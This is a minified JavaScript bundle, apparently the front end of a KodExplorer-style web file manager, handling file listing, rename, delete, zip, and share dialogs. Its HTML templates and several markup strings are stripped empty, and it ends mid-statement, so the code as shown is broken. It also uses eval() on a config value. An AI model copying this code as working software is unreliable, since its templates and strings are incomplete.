i.mtime=date(LNG.time_type,i.mtime);i.name=htmlEncode(i.name),i.sid&&"file"==i.type&&(i.ext=htmlEncode(core.pathExt(i.path))),pathIsShare(i.path)?i.metaInfo="path-self-share":pathIsFav(i.path)&&(i.metaInfo="tree-fav"),"number"==typeof i.isReadable&&0==i.isReadable?i.mode="["+LNG.not_read+"] "+i.mode:"number"==typeof i.isWriteable&&1==i.isWriteable?i.mode="["+LNG.system_role_write+"] "+i.mode:"number"==typeof i.isReadable&&1==i.isReadable&&(i.mode="["+LNG.only_read+"] "+i.mode),e.info&&e.info.pathType==G.KOD_USER_RECYCLE&&trim(e.thisPath,"/")==G.KOD_USER_RECYCLE&&(i.menuType="menu-recycle-path")}return e.filterSuccess=!0,e},jsonDataSortTitle=function(){var up='',down='';$("#main-title .this").toggleClass("this").attr("id","").find("span").html(""),$("#main-title div[field="+G.userConfig.listSortField+"]").addClass("this").attr("id",G.userConfig.listSortOrder).find("span").html(eval(G.userConfig.listSortOrder))},pathIsShare=function(e){for(var t in G.selfShare)if(core.pathClear(G.selfShare[t].path)==core.pathClear(e))return!0;return!1},pathIsFav=function(e){var t=G.fav_list;for(var a in t)if(core.pathClear(a)==core.pathClear(e))return!0;return!1},checkRecycle=function(){$.ajax({url:G.appHost+"explorer/pathList&type=desktop&path="+G.KOD_USER_RECYCLE,dataType:"json",error:core.ajaxError,success:function(e){if(!e.code)return!1;var t=core.icon("recycle-full");0==e.data.folderList.length&&0==e.data.fileList.length&&(t=core.icon("recycle")),$(".menu-recycle-button .ico").html(t)}})},pathTypeChange=function(e){if(e.info){var t=e.info,a=t.pathType,i=e.pathReadWrite,n="menu-body-main menu-recycle-body menu-share-body",o=$(".drag-upload-box");t.canUpload=!0,(void 0!=i&&"writeable"!=i||a==G.KOD_GROUP_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_USER_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_GROUP_PATH&&"guest"==t.role&&1!=G.isRoot||a==G.KOD_USER_FAV||a==G.KOD_USER_RECYCLE||a==G.KOD_GROUP_ROOT_ALL||a==G.KOD_GROUP_ROOT_SELF)&&(t.canUpload=!1);var s=[G.KOD_USER_SHARE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL],r=".kod-toolbar-recycle,.kod-toolbar-share";$(r).addClass("hidden"),a==G.KOD_USER_RECYCLE?(o.removeClass(n).addClass("menu-recycle-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-recycle").removeClass("hidden")):-1!==s.indexOf(a)?-1===core.pathClear(rtrim(G.thisPath,"/")).indexOf("/")?(o.removeClass(n).addClass("menu-share-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-share").removeClass("hidden"),t.id==G.userID?($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").removeClass("hidden"),$(".menu-share-path-more").find(".remove").removeClass("hidden")):($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").addClass("hidden"),$(".menu-share-path-more").find(".remove").addClass("hidden"))):(o.removeClass(n).addClass("menu-body-main"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")):(o.removeClass(n).addClass("menu-body-main"),$(".tools-lef .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")),currentPathMenu(e)}},currentPathMenu=function(e){var t=e.info,a=e.pathReadWrite,i=t.pathType,n=".create-link,.create-project,.cute,.remove,.rname,.zip,.unzip-this,.unzip-folder,.newfile,.newfolder,.new-file-other,.app-create,.app-install,.past,.upload,.clone",o="disable",s=$(".kod-toolbar-path .btn").not(".toolbar-path-more"),r=$("ul.menu-folder,ul.menu-more,ul.menu-file,ul.file-continerMenu");t.canUpload?(r.find(n).removeClass(o),$(".path-tips").hide(),s.removeClass("disabled")):(s.addClass("disabled"),r.find(n).addClass(o),$(".path-tips span").html(LNG.only_read),i==G.KOD_USER_RECYCLE||i==G.KOD_USER_SHARE?($(".path-tips").hide(),s.removeClass("disabled"),i==G.KOD_USER_SHARE&&G.userID!=t.id&&s.addClass("disabled")):$(".path-tips").show());var l=$(".group-space-use");if((i==G.KOD_GROUP_PATH||i==G.KOD_GROUP_SHARE)&&G.isRoot||i==G.KOD_GROUP_PATH&&"owner"==t.role){var c=e.groupSpaceUse;if(c){var d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);l.removeClass("hidden").html(d)}else l.addClass("hidden")}else l.addClass("hidden");if(e.userSpace){var c=e.userSpace,d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);$(".user-space-info").html(d)}if("notExists"==a&&($(".path-tips span").html(LNG.not_exists),$(".path-tips").show()),$(".role-label-box").html(""),i==G.KOD_GROUP_SHARE){var p=""+LNG.group_guest+"";$(".role-label-box").html(p),G.isRoot&&$(".role-label-box").html("")}else if(i==G.KOD_GROUP_PATH&&t.groupRole){var p=""+t.groupRole.name+"";$(".role-label-box").html(p)}(i==G.KOD_GROUP_ROOT_ALL||i==G.KOD_GROUP_ROOT_SELF||i==G.KOD_USER_FAV||i==G.KOD_GROUP_SHARE)&&$(".path-tips").hide(),1==G.isRoot&&t.adminRealPath?$(".admin-real-path").removeClass("hidden"):$(".admin-real-path").addClass("hidden")};return{f5:f5,f5Callback:f5Callback,pathTypeChange:pathTypeChange,pathChildrenTree:pathChildrenTree,pathChildrenSplit:pathChildrenSplit,init:function(){$(window).bind("resize",function(){resetTotalHeight(),core.isApp("desktop")?ui.resetDesktopIcon():ui.headerAddress.resetWidth()}),bindScrollLoadMore()}}}),define("app/path/tpl/file/list.html",[],"\n{{if type=='icon-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{fileIconMake('folder','icon',list)}}\n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='list-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if list.isParent&&list.isReadable}}{{/if}}\n \n
    \n {{fileIconMake('folder','list',list)}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
    \n
    {{LNG.folder}}
    \n
    \n
    {{list.mtime || \"\"}}
    \n
    \n
    \n{{if list.isParent&&list.isReadable}}\n
    \n{{/if}}\n\n\n{{else if type=='split-folder'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n {{fileIconMake('folder','split',list)}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n \n {{if list.isReadable && typeof(list.menuType)==\"undefined\"}}\n \n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='icon-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n {{fileIconMake('file','icon',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n
    \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    \n\n\n{{else if type=='list-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n \n {{fileIconMake('file','list',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    {{list.ext |kod.window.htmlEncode}} {{LNG.file}}
    \n
    {{list.size |pathTools.fileSize}}
    \n
    {{list.mtime || \"\"}}
    \n
    \n
    \n\n\n{{else if type=='split-file'}}\n
    \n {{if !list.menuType}}
    {{/if}}\n
    \n
    \n {{fileIconMake('file','split',list)}}\n {{if list.metaInfo}}\n
    {{list.metaInfo |kod.core.icon}}
    \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
    \n
    \n{{/if}}\n\n"),define("app/path/path",["./pathOperate","./clipboard","./search"],function(e){var t=e("./pathOperate"),a=e("./clipboard"),i=e("./search"),n=void 0,o=function(){if(G.jsonData.info.pathType==G.KOD_USER_RECYCLE||G.jsonData.info.pathType==G.KOD_USER_SHARE)return!0;if(ui.fileLight){var e=ui.fileLight.fileListSelect();if(e.hasClass("systemBox"))return Tips.tips(LNG.path_can_not_action,"warning"),!1}return!0},s=function(e,t,a,i){if(e){if(!core.isApp("explorer"))return core.explorer(e),void 0;if(e==G.thisPath)return void 0!=t&&""!=t&&Tips.tips(LNG.path_is_current,"info"),void 0;G.thisPath=e.replace(/\\/g,"/"),G.thisPath=e.replace(/\/+/g,"/"),"/"!=G.thisPath.substr(G.thisPath.length-1)&&(G.thisPath+="/");var n=$(".dialog-file-upload");if(n.length>0){var o="none"==n.css("display")||"hidden"==n.css("visibility");o||core.upload()}if(G.sid!==void 0&&(window.location.href="#"+urlEncode(G.thisPath)),core.playSound("folder_open"),i||ui.path.history.add(G.thisPath),"split"==G.userConfig.listType){var s=$(".split-box .file[data-path="+pathHashEncode(G.thisPath)+"]");if(0!=s.length&&0!=s.find(".children-more-cert").length)return s.click(),void 0;$(".file-list-split .split-box").remove()}ui.f5Callback(function(){"function"==typeof a&&a()})}},r=function(){var e=[],t=60,a=0,i=function(i){var n=e.length-1;return n==a&&e[n]==i?r():(a!=n&&(e=e.slice(0,a+1)),e[e.length-1]!=i&&e.push(i),e.length>=t&&(e=e.slice(1)),a=e.length-1,r(),void 0)},n=function(){e.length-1>=a+1&&(s(e[++a],"","",!0),r())},o=function(){a-1>=0&&(s(e[--a],"","",!0),r())},r=function(){var t="disable",i=e.length-1;$("#btn-history-next").addClass(t),$("#btn-history-back").addClass(t),(0!=a||0!=i)&&(a>0&&i>=a&&$("#btn-history-back").removeClass(t),a>=0&&a!=i&&$("#btn-history-next").removeClass(t))};return{add:i,back:o,next:n,list:function(){return e}}}(),l=function(e){if(void 0!=e){"string"==typeof e&&(e=[e]);for(var t=0;e.length>t;t++)e[t]=trim(e[t],"/");ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(){var t=trim(ui.fileLight.path($(this)),"/");t&&-1!=$.inArray(t,e)&&$(this).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView()}},c=function(e){if(""!=e){if(e=e.toLowerCase(),void 0==n||G.thisPath!=n.path||e!=n.key){var t=[];ui.fileLight.fileListAll().each(function(){var a=ui.fileLight.name($(this)),i=ui.fileLight.path($(this));a&&e==a.substring(0,e.length).toLowerCase()&&t.push(i)}),n={key:e,path:G.thisPath,index:0,list:t}}0!=n.list.length&&(Tips.pop(n.key),l(n.list[n.index++]),n.index==n.list.length&&(n.index=0))}},d=function(e){return""==e?(ui.fileLight.clear(),void 0):(ui.fileLight.clear(),ui.fileLight.fileListAll().each(function(t){var a=ui.fileLight.name($(this));-1!=a.toLowerCase().indexOf(e)&&$(ui.fileLight.fileListAll()).eq(t).addClass(Config.SelectClassName)}),ui.fileLight.select(),ui.fileLight.setInView(),void 0)},p=function(e,t){var a=G.thisPath+e;return void 0==t&&(a+="/"),0!=$('.bodymain .file[data-path="'+pathHashEncode(a)+'"]').length?!0:!1},u=function(e,t){var a,i=0,n="."+t;if((void 0==t||""==t)&&(n=""),!p(e+n,t))return e+n;for(a=e+"(0)"+n;p(a,t);)i++,a=e+"("+i+")"+n;return a},f=function(e,t){var a,i=0,n=G.jsonData.folderList,o=G.jsonData.fileList,s=n,r=G.userConfig.listSortField,l=G.userConfig.listSortOrder,c={name:e,size:0,ext:t,mtime:date("Y/m/d H:i:s",time())};for(core.isApp("desktop")&&(i+=$(".menu-default").length+1),"file"==t?(c.ext=core.pathExt(e),s=o,"up"==l&&(i+=n.length)):"down"==l&&(i+=o.length),a=0;s.length>a;a++)if("down"==l){if(-1==pathTools.strSort(s[a][r],c[r]))break}else if(-1!=pathTools.strSort(s[a][r],c[r]))break;return a+i-1},h=function(a,i,n){ui.fileLight.clear();var o=f(i,a),s=$(Config.FileBoxSelector);"split"==G.userConfig.listType&&(s=$(".split-box.split-select").find(".content"));var r=e("./tpl/file/create.html"),l=template.compile(r),c=l({type:a,newname:i,ext:n,listType:G.userConfig.listType});if(-1==o||0==s.find(".file").length)s.html(c+s.html());else{var d=s.find(".file:eq("+o+")");0==d.length&&(d=s.find(".file").last()),"split"==G.userConfig.listType&&(d=$(".split-box.split-select .file").last()),$(c).insertAfter(d)}var u=$(".textarea .newfile"),h=i.length;"folder"!=a&&-1!=i.indexOf(".")&&(h=i.length-n.length-1),u.textSelect(0,h),"split"==G.userConfig.listType&&u.css("width",u.parents(".filename").width()-40),"icon"==G.userConfig.listType?($("#makefile").css({height:$("#makefile").width()+15,transition:"none"}),$("#makefile .textarea").css("margin-top","-13px")):$("#makefile .x-item-file").addClass("small"),core.isApp("desktop")&&ui.resetDesktopIcon();var m=function(e){e===!1?$("#makefile").remove():v(e)},g=function(e){if(""==trim(e))return $("#makefile").remove(),Tips.tips(LNG.error,"warning"),void 0;if(p(e,n))$("#makefile").remove(),Tips.tips(LNG.path_exists,"warning");else{var i=G.thisPath;"split"==G.userConfig.listType&&(i=ui.fileLight.path($(".file-icon-edit").parents(".split-box"))),"folder"==a?t.newFolder(i+e,m):t.newFile(i+e,m)}};ui.fileLight.setInView($(".file-continer .file-icon-edit")),u.focus().autoTextarea(),u.unbind("keydown").keydown(function(e){13==e.keyCode&&(stopPP(e),e.preventDefault(),g(u.attr("value"))),27==e.keyCode&&$("#makefile").remove()}).unbind("blur").blur(function(){g(u.attr("value"))})},m=function(){var e="",a=ui.fileLight.fileListSelect(),i=ui.fileLight.name(a),n=core.pathFather(ui.fileLight.path(a)),s=ui.fileLight.type(a);if(1==a.length&&o()){if(a.hasClass("menuSharePath"))return ui.path.shareEdit(),void 0;var r=htmlEncode(rtrim(i,".oexe")),l="";"icon"==G.userConfig.listType&&(l="",a.css({height:a.height()})),$(a).addClass("file-icon-edit").find(".title").html("
    "+l+"
    ");var c=$("#pathRenameTextarea");"split"==G.userConfig.listType&&c.css({width:c.parents(".filename").width()-32,height:c.parents(".filename").height()+1});var d=i.length;"folder"!=s&&-1!=i.indexOf(".")&&(d=i.length-s.length-1),s||0!=i.indexOf(".")?c.textSelect(0,d):c.textSelect(0,i.length);var p=function(o){if("oexe"==s&&(o+=".oexe"),o!=i)e=n+i,o=n+o,t.rname(e,o,function(e){e===!1?$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(i)):v(e)});else{var r=i;".oexe"==r.substr(-5)&&(r=r.substr(0,r.length-5)),$(a).removeClass("file-icon-edit").find(".title").html(htmlEncode(r))}};c.focus().autoTextarea(),c.keydown(function(e){13==e.keyCode&&(e.preventDefault(),stopPP(e),p(c.attr("value"))),27==e.keyCode&&("oexe"==s&&(i=i.replace(".oexe","")),$(a).removeClass("file-icon-edit").find(".title").html(i))}).unbind("blur").blur(function(){p(c.val())})}},v=function(e){ui.fileLight.clear(),ui.f5Callback(function(){l(e),core.isApp("explorer")&&ui.tree.checkIfChange(G.thisPath)})},g=function(e){var t={},a=[];e.sort(function(e,t){return e.path==t.path?0:e.path>t.path?1:-1});for(var i=function(e){for(var a=e;""!=e;){if(t[e]!==void 0)return 1==t[e]?!0:a==e?(t[e]=1,!1):!0;e=core.pathFather(e)}return!1},n=0;e.length>n;n++)if("folder"==e[n].type){var o=rtrim(e[n].path,"/")+"/";t[o]||i(o)||(t[o]=0) +}for(var n=0;e.length>n;n++){var o=e[n].path;"folder"==e[n].type&&(o=rtrim(o,"/")+"/"),i(o)||a.push(e[n])}return a},b=function(e,t,a){var i=ui.fileLight.fileListSelect();if(e){var n=[];return 0==i.length?n:(i.each(function(){var e=ui.fileLight.path($(this)),t="folder"==ui.fileLight.type($(this))?"folder":"file";n.push({path:e,type:t})}),g(n))}if(1!=i.length)return{path:"",type:""};var t=ui.fileLight.path(i),a=ui.fileLight.type(i);return{path:t,type:a}},y=function(e,t){for(var a in G.jsonData)if("fileList"==a||"folderList"==a)for(var i=0;G.jsonData[a].length>i;i++)if(G.jsonData[a][i][e]==t)return G.jsonData[a][i]};return{search:i,makeParam:b,refreshCallback:v,history:r,getJsondataCell:y,checkSystemPath:o,pathOperate:t,appList:function(){t.appList(b().path)},appInstall:function(){t.appInstall(b().path)},openWindow:function(){var e=b();return"folder"==e.type&&-1!=core.path2url(e.path).search("explorer/fileProxy")?(Tips.tips(LNG.path_can_not_action,!1),void 0):(kodApp.openWindow(e.path),void 0)},open:function(e){var t=ui.fileLight.fileListSelect();if(void 0!=e||core.isApp("editor"))return kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e),void 0;if(0!=t.length){var a=b();if(0!=$(t).find(".file-not-exists").length)return Tips.tips(LNG.share_error_path,!1),void 0;if("split"!=G.userConfig.listType||"folder"!=a.type){if("oexe"==a.type){var i=t.attr("data-app");if(i){var n=jsonDecode(base64Decode(i));return core.openApp(n),void 0}}kodApp.setLastOpenTarget(t),kodApp.open(a.path,a.type)}}},share:function(){t.share(b())},setBackground:function(){var e=core.path2url(b().path);ShareData.frameTop("",function(t){t.ui.setWall(e)}),ui.setWall(e),t.setBackground(e)},createLink:function(e){var a=b(),i=ui.fileLight.fileListSelect().last();a.name=trim(i.find(".filename").text()),t.createLink(a.path,a.name,a.type,e,v)},createProject:function(){t.createProject(b().path,v)},download:function(){var e=b(!0),a=!1;$.each(e,function(){"folder"==this.type&&(a=!0)}),a||$.isIE()?t.zipDownload(e):$.each(e,function(){kodApp.download(this.path)})},shareEdit:function(){var e=y("path",b().path);try{var a=G.jsonData.shareList[e.sid];t.shareBox(a)}catch(i){}},shareOpenWindow:function(){var e=y("path",b().path),t="file";"folder"==e.type&&(t=1==e.codeRead?"codeRead":"folder");var a=G.appHost+"share/"+t+"&user="+G.jsonData.info.id+"&sid="+e.sid;window.open(a)},shareOpenPath:function(){var e=b(),t=y("path",e.path);if(!t||!G.jsonData.shareList)return kodApp.open(e.path,e.type),void 0;var a=G.jsonData.shareList[t.sid],i=core.pathFather(a.path),n=core.pathThis(a.path);"folder"==a.type?ui.path.list(a.path,""):ui.path.list(i,"",function(){l(n)})},explorer:function(){core.explorer(b().path)},explorerNew:function(){window.open(G.appHost+"explorer&path="+b().path)},openProject:function(){core.explorerCode(b().path)},search:function(){i("",b().path)},fav:function(){var e=b(),a=ui.fileLight.fileListSelect().last();e.name=trim(a.find(".filename").text()),t.fav(e)},recycleClear:function(){t.remove([{type:"recycle-clear",path:""}],function(){ui.f5()})},remove:function(e,a,i){if(G.jsonData.info&&o()){var n=b(!0);G.jsonData.info&&G.jsonData.info.pathType==G.KOD_USER_SHARE&&G.jsonData.info.id==G.userID&&-1==trim(G.thisPath,"/").indexOf("/")&&$.each(n,function(e){var t=y("path",n[e].path);void 0!=t&&(n[e].type="share",n[e].path=t.sid)}),i?t.remove(n,i,e,a):t.remove(n,v,e,a)}},favRemove:function(){var e=$(".file.select .filename");e.each(function(a){var i=trim($(this).text());a!=e.length-1?t.favRemove(i,"",!0):t.favRemove(i,function(e){Tips.tips(e),ui.tree.refreshFav()},!0)})},clipboard:function(){a.clipboard()},copy:function(){o()&&a.copy(b(!0))},cute:function(){o()&&a.cute(b(!0),ui.f5)},cuteDrag:function(e){a.cuteDrag(b(!0),e,v)},copyDrag:function(e,t){a.copyDrag(b(!0),e,v,t)},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){a.copyDrag(b(!0),e,v,!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){a.cuteDrag(b(!0),e,v)})},past:function(){var e=G.thisPath;"split"==G.userConfig.listType&&($containBox=$(".split-box.split-select"),1==$containBox.length&&(e=ui.fileLight.path($containBox))),a.past(e,v)},info:function(){t.info(b(!0))},newFile:function(e){void 0==e&&(e="txt"),h("file",u("newfile",e),e)},newFolder:function(){h("folder",u(LNG.newfolder),"")},shareFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+urlEncode(b().path);window.open(e)},rname:m,list:s,setSearchByStr:d,setSelectByChar:c,setSelectByFilename:l}}),define("app/path/pathOperate",[],function(e){tplFileInfo=e("./tpl/fileinfo/fileInfo.html"),tplPathInfo=e("./tpl/fileinfo/pathInfo.html");var t=["/","\\",":","*","?",'"',"<",">","|"],a=["/","\\"],i=function(e){var i=function(e,t){for(var a=t.length,i=0;a>i;i++)if(e.indexOf(t[i])>0)return!0;return!1},n=a;return G.systemOS&&"windows"==G.systemOS&&(n=t),i(e,n)?(Tips.tips(LNG.path_not_allow+": "+n.join(", "),!1),!1):!0},n=function(e){for(var t=[],a=function(e){return e?e.replace(/"/g,'\\\\"'):e},i=0;e.length>i;i++)t.push({type:a(e[i].type),path:urlEncode(a(e[i].path))});return"dataArr="+jsonEncode(t)},o=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkfile&path="+urlEncode(e),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},s=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkdir&path="+urlEncode(e),beforeSend:function(){"function"==typeof t&&Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},r=function(e,t,a){return e&&t&&e!=t?i(core.pathThis(t))?($.ajax({type:"POST",dataType:"json",url:G.appHost+"explorer/pathRname",data:"path="+urlEncode(e)+"&rnameTo="+urlEncode(t),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof a&&(e&&e.info?a(e.info):a(!1))}}),void 0):("function"==typeof a&&a(),void 0):void 0},l=function(e,t,a,i){if(a=void 0==a?!1:a,i=void 0==i?!1:i,window.event&&window.event.shiftKey&&(i=!0),!(1>e.length)){var o=LNG.remove_title,s=LNG.remove_info,r=G.appHost+"explorer/pathDelete",l=n(e);if("share"==e[0].type&&(o=LNG.share_remove,s=LNG.share_remove_tips,r=G.appHost+"userShare/del"),i&&(s=LNG.remove_info_force,o=LNG.remove_title_force,r+="&shiftDelete=1"),("recycle-clear"==e[0].type||G.USER_RECYCLE&&G.thisPath==G.USER_RECYCLE||G.thisPath==core.pathFather(G.myhome)+"recycle_kod/")&&(s=LNG.recycle_clear_info,r=G.appHost+"explorer/pathDeleteRecycle",o=LNG.recycle_clear,"recycle-clear"==e[0].type&&(l="postEmpty=1")),e[0]&&e[0].path){var c=""+htmlEncode(core.pathThis(e[0].path))+"";s=e.length>1?c+' ... '+e.length+LNG.remove_item+"
    "+s:c+"
    "+s}var d=function(){$.ajax({url:r,type:"POST",dataType:"json",data:l,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){if(Tips.close(a),ShareData.frameTop("",function(e){e.ui.f5()}),"share"==e[0].type){G.selfShare=a.info;var i=$.dialog.list["share-dialog"];void 0!=i&&i.close()}o==LNG.recycle_clear?core.playSound("recycle_clear"):core.playSound("file_remove"),"function"==typeof t&&t(a)}})};a?d():$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:o,padding:"40px 40px",lock:!0,background:"#000",opacity:.1,content:"
    "+s+"
    ",ok:d,cancel:!0})}},c=function(e){if(core.authCheck("explorer.fileDownload",!0)&&!(1>e.length)){var t=G.appHost+"explorer/zipDownload";G.sharePage!==void 0&&(t=G.appHost+"share/zipDownload&user="+G.user+"&sid="+G.sid),$.ajax({url:t,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.zip_download_ready)},error:core.ajaxError,success:function(e){Tips.close(e),Tips.tips(e);var t=G.appHost+"explorer/fileDownloadRemove&path="+urlEncode(e.info);t+="&accessToken="+G.accessToken,G.sharePage!==void 0&&(t=G.appHost+"share/fileDownloadRemove&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e.info)),$.dialog({icon:"succeed",title:!1,time:2,content:LNG.download_ready+"..."}),$('').appendTo("body")}})}},d=function(e,t,a){1>e.length||(a||(a="zip"),$.ajax({url:G.appHost+"explorer/zip&fileType="+a,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.ziping)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof t&&t(e.info)}}))},p=function(e,t,a){if(e){var i=function(e){$.ajax({url:e,beforeSend:function(){Tips.loading(LNG.unziping)},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&t(e)}})},n=G.appHost+"explorer/unzip&path="+urlEncode(e);"toThis"==a&&(n+="&toThis=1"),"toFolder"==a?core.api.pathSelect({type:"folder",title:LNG.unzip_to},function(e){n+="&pathTo="+e,i(n)}):i(n)}},u=function(e){var t=e.path,a=core.pathPre(t);if(a==G.KOD_GROUP_PATH||a==G.KOD_GROUP_SHARE||a==G.KOD_USER_SHARE)return Tips.tips(LNG.path_can_not_share,"warning"),void 0;var i="folder"==e.type?"folder":"file";1>t.length||core.authCheck("userShare.set",!0)&&$.ajax({url:G.appHost+"userShare/checkByPath&path="+urlEncode(t),dataType:"json",error:core.ajaxError,success:function(e){if(e.code)f(e.data);else{G.selfShare=e.info;var a={path:t,type:i,name:core.pathThis(t)};h(a,function(e){e.code?(G.selfShare=e.info,ui.f5(),f(e.data)):(Tips.tips(e),f(void 0,function(){$(".content-info input[name=type]").val(i),$(".content-info input[name=path]").val(t),$(".content-info input[name=name]").val(core.pathThis(t)+"(1)"),"file"==i&&($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden"))}))})}}})},f=function(t,a){0!=$(".share-dialog").length&&$(".share-dialog").shake(3,30,100),e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){m(t),void 0!=a&&a()})},h=function(e,t){$.ajax({url:G.appHost+"userShare/set",data:e,type:"POST",dataType:"json",beforeSend:function(){$(".share-create-button").addClass("disabled")},error:function(){Tips.tips(LNG.error,!1)},success:function(e){$(".share-create-button").removeClass("disabled"),void 0!=t&&t(e)}})},m=function(t){var a=e("./tpl/share.html"),i=template.compile(a),n=i({LNG:LNG});$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,title:LNG.share,padding:"0",fixed:!0,content:n});var o="zh-CN"==G.lang?"ch":"en";$("#share-time").datetimepicker({format:"Y/m/d",formatDate:"Y/m/d",timepicker:!1,lang:o}),$("#share-time").unbind("blur").bind("blur",function(e){stopPP(e)});var s=function(e){if($(".share-setting-more").addClass("hidden"),void 0==e)$(".share-has-url").addClass("hidden"),$(".share-action .share-remove-button").addClass("hidden"),$(".content-info input[name=sid]").val(""),$(".content-info input[name=type]").val(""),$(".content-info input[name=name]").val(""),$(".content-info input[name=showName]").val(""),$(".content-info input[name=path]").val(""),$(".content-info input[name=timeTo]").val(""),$(".content-info input[name=sharePassword]").val(""),$(".share-view-info").addClass("hidden");else{e.canUpload===void 0&&(e.canUpload=""),t=e,e.showName||(e.showName=e.name),$(".content-info input[name=sid]").val(e.sid),$(".content-info input[name=type]").val(e.type),$(".content-info input[name=name]").val(e.name),$(".content-info input[name=showName]").val(e.showName),$(".content-info input[name=path]").val(e.path),$(".content-info input[name=timeTo]").val(e.timeTo),$(".content-info input[name=sharePassword]").val(e.sharePassword),$(".share-view-info").removeClass("hidden"),e.numDownload===void 0&&(e.numDownload=0),e.numView===void 0&&(e.numView=0);var a=LNG.share_view_num+e.numView+" "+LNG.share_download_num+e.numDownload;$(".share-view-info").html(a),"1"==e.codeRead?$(".content-info input[name=codeRead]").attr("checked","checked"):$(".content-info input[name=codeRead]").removeAttr("checked"),"1"==e.notDownload?$(".content-info input[name=notDownload]").attr("checked","checked"):$(".content-info input[name=notDownload]").removeAttr("checked"),"1"==e.canUpload?$(".content-info input[name=canUpload]").attr("checked","checked"):$(".content-info input[name=canUpload]").removeAttr("checked"),$(".share-has-url").removeClass("hidden"),"file"==e.type?($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden")):($(".label-code-read").removeClass("hidden"),$(".label-can-upload").removeClass("hidden"));var i=e.type;"folder"==e.type&&(i=1==e.codeRead?"codeRead":"folder");var n=G.appHost+"share/"+i+"&user="+G.userID+"&sid="+e.sid;$(".content-info .share-url").val(n),(e.timeTo||e.sharePassword||e.canUpload||e.codeRead||e.notDownload)&&$(".share-setting-more").removeClass("hidden"),$(".share-remove-button").removeClass("hidden"),$(".share-create-button").text(LNG.share_save)}},r=function(){$(".share-action .share-remove-button").unbind("click").click(function(){l([{type:"share",path:t.sid}],function(){ui.f5()})}),$(".content-info .share-more").unbind("click").click(function(){$(".share-setting-more").toggleClass("hidden")}),$(".share-action .share-create-button").unbind("click").click(function(){var e="";$(".share-dialog .content-info 